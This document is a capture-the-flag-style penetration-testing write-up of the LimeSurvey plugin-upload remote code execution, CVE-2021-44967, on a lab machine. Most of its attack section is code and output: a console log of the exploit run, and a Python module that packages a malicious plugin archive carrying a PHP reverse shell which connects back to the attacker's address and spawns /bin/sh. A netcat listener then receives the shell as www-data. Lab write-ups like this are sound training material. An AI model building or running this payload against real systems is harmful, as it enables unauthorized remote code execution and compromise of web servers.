CVE-2021-44967


The target LimeSurvey instance was suspected to be vulnerable to CVE-2021-44967, an authenticated remote code execution flaw in the plugin manager: a user with administrative access can upload, install and activate a crafted plugin archive, and the PHP file it contains is then reachable directly over HTTP. The public exploit script was modified to fit the current engagement context (target URL, credentials and listener).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/marketing/Limesurvey-RCE]
└─$ python3 exploit.py http://customers-survey.marketing.pg admin password 80
_______________LimeSurvey RCE_______________
 
 
Usage: python exploit.py URL username password port
Example: python exploit.py http://192.26.26.128 admin password 80
 
 
== ██╗   ██╗ ██╗██╗     ██████╗  ██╗██████╗  ██╗███╗   ███╗ ==
== ╚██╗ ██╔╝███║██║     ██╔══██╗███║██╔══██╗███║████╗ ████║ ==
==  ╚████╔╝ ╚██║██║     ██║  ██║╚██║██████╔╝╚██║██╔████╔██║ ==
==   ╚██╔╝   ██║██║     ██║  ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==
==    ██║    ██║███████╗██████╔╝ ██║██║  ██║ ██║██║ ╚═╝ ██║ ==
==    ╚═╝    ╚═╝╚══════╝╚═════╝  ╚═╝╚═╝  ╚═╝ ╚═╝╚═╝     ╚═╝ ==
 
 
[+] Retrieving CSRF token...
  CSRF_token = s.findAll('input')[0].get("value")
UDBZbTU0T1Z-YUpaSWxjbFRHSzMwVmFQclliYl94aXa_RTQbQC1WsrZVZh5N-zieCI2vY23Dk486kglIVU7qug==
[+] Sending Login Request...
[+]Login Successful
 
[+] Upload Plugin Request...
[+] Retrieving CSRF token...
  CSRF_token2 = s.findAll('input')[0].get("value")
WjdsYjF-dDI4QWlpQ25uUHNKNWZORXlaa2NMX2kzVkKw3wr-qZ-MdRuwinSIOhsjpXNIt0ucZjaoi7J0zonOLQ==
[+] Plugin Uploaded Successfully
 
[+] Install Plugin Request...
[+] Retrieving CSRF token...
  CSRF_token3 = s.findAll('input')[0].get("value")
WjdsYjF-dDI4QWlpQ25uUHNKNWZORXlaa2NMX2kzVkKw3wr-qZ-MdRuwinSIOhsjpXNIt0ucZjaoi7J0zonOLQ==
[+] Plugin Installed Successfully
 
[+] Activate Plugin Request...
[+] Retrieving CSRF token...
  CSRF_token4 = s.findAll('input')[0].get("value")
WjdsYjF-dDI4QWlpQ25uUHNKNWZORXlaa2NMX2kzVkKw3wr-qZ-MdRuwinSIOhsjpXNIt0ucZjaoi7J0zonOLQ==
[+] Plugin Activated Successfully
 
[+] Reverse Shell Starting, Check Your Connection :)

Executing the exploit
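The output above shows the order of operations (CSRF token, login, plugin upload, install, activate, callback) but not what the script actually sends. The following is an added example for this writeup, not the public PoC's code and not part of the original page. It covers the two offline pieces: pulling the Yii CSRF token out of a LimeSurvey form by field name (the PoC line `s.findAll('input')[0]` shown in the output takes whichever input comes first), and packaging a plugin archive whose PHP payload runs the same `uname -a; w; id; /bin/sh -i` chain that the listener output below reflects. The plugin name, payload file name, manifest values, sample HTML and the `upload/plugins/` path are assumptions; the attacker address and port are the ones used on this page.

```python
"""Added example (not the PoC's code): CSRF token extraction by field name and
construction of a LimeSurvey plugin archive carrying a PHP reverse shell.
Assumed: PLUGIN_NAME, PAYLOAD_FILE, manifest values, SAMPLE_LOGIN_HTML."""
import io
import zipfile
from html.parser import HTMLParser

PLUGIN_NAME = "EngagementPlugin"  # assumed plugin name
PAYLOAD_FILE = "shell.php"        # assumed name of the PHP file in the archive
CSRF_FIELD = "YII_CSRF_TOKEN"     # Yii 1.x default CSRF field name used by LimeSurvey


class _InputCollector(HTMLParser):
    """Collect name -> value for every <input> element in a page."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            a = dict(attrs)
            if a.get("name"):
                self.fields[a["name"]] = a.get("value") or ""


def extract_csrf_token(html, field=CSRF_FIELD):
    """Return the CSRF token selected by field name, not by position.
    Taking the first <input> on the page (as the PoC does) silently yields
    the wrong value if the form layout differs; this raises instead."""
    parser = _InputCollector()
    parser.feed(html)
    token = parser.fields.get(field)
    if not token:
        raise ValueError(f"no {field} input found in page")
    return token


def plugin_config_xml(name=PLUGIN_NAME):
    """Plugin manifest read by the LimeSurvey plugin manager (example values)."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<config>
  <metadata>
    <name>{name}</name>
    <type>plugin</type>
    <creationDate>2022-01-01</creationDate>
    <lastUpdate>2022-01-01</lastUpdate>
    <author>engagement</author>
    <authorUrl>http://example.invalid</authorUrl>
    <supportUrl>http://example.invalid</supportUrl>
    <version>1.0.0</version>
    <license>GPL-2.0-or-later</license>
    <description><![CDATA[engagement test plugin]]></description>
  </metadata>
  <compatibility>
    <version>3.0</version>
    <version>4.0</version>
    <version>5.0</version>
  </compatibility>
</config>
"""


def php_reverse_shell(lhost, lport):
    """PHP that connects back and attaches a shell to the socket. The command
    chain is the one whose output appears in the listener: uname -a, w, id,
    then an interactive /bin/sh (hence the 'can't access tty' message)."""
    return (
        "<?php\n"
        f'$sock = fsockopen("{lhost}", {int(lport)});\n'
        '$cmd = "uname -a; w; id; /bin/sh -i";\n'
        "proc_open($cmd, array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);\n"
    )


def build_plugin_zip(lhost, lport, name=PLUGIN_NAME, payload_file=PAYLOAD_FILE):
    """Bytes of the archive to upload: config.xml plus the PHP payload.
    After install the files are expected under upload/plugins/<name>/ (assumed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("config.xml", plugin_config_xml(name))
        zf.writestr(payload_file, php_reverse_shell(lhost, lport))
    return buf.getvalue()


def zip_entries(data):
    """name -> contents for each member; used to check what was built."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: zf.read(n) for n in zf.namelist()}


# Constructed login-form fragment (not captured from the target); the CSRF
# field is deliberately not the first input, which is where the PoC looks.
SAMPLE_LOGIN_HTML = """
<form method="post" action="/index.php/admin/authentication/sa/login">
  <input type="text" name="user" value="" />
  <input type="password" name="password" value="" />
  <input type="hidden" name="YII_CSRF_TOKEN" value="c29tZS1leGFtcGxlLXRva2Vu" />
</form>
"""

if __name__ == "__main__":
    print(extract_csrf_token(SAMPLE_LOGIN_HTML))
    entries = zip_entries(build_plugin_zip("192.168.45.198", 9999))
    print(sorted(entries))
```

The token goes into the `YII_CSRF_TOKEN` form field of every subsequent POST (login, upload, install, activate), and a fresh one should be read from each page rather than reused blindly; the output above shows the script re-fetching it before each step.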

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/marketing/Limesurvey-RCE]
└─$ nnc 9999                                                            
listening on [any] 9999 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.211.225] 34552
Linux marketing 5.4.0-122-generic #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 15:11:21 up 45 min,  0 users,  load average: 0.00, 0.00, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
marketing
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:73:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.211.225/24 brd 192.168.211.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target as the www-data account by exploiting CVE-2021-44967. The callback is a plain /bin/sh without a tty (note the job-control warning above), so it should be upgraded before interactive tooling is used.